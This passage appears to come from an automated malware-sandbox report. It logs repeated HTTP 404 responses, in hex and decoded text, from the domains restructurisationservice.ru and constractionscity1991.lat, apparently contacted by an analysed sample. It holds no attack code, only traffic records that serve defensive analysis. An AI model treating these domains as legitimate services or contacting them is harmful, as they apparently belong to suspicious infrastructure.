72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
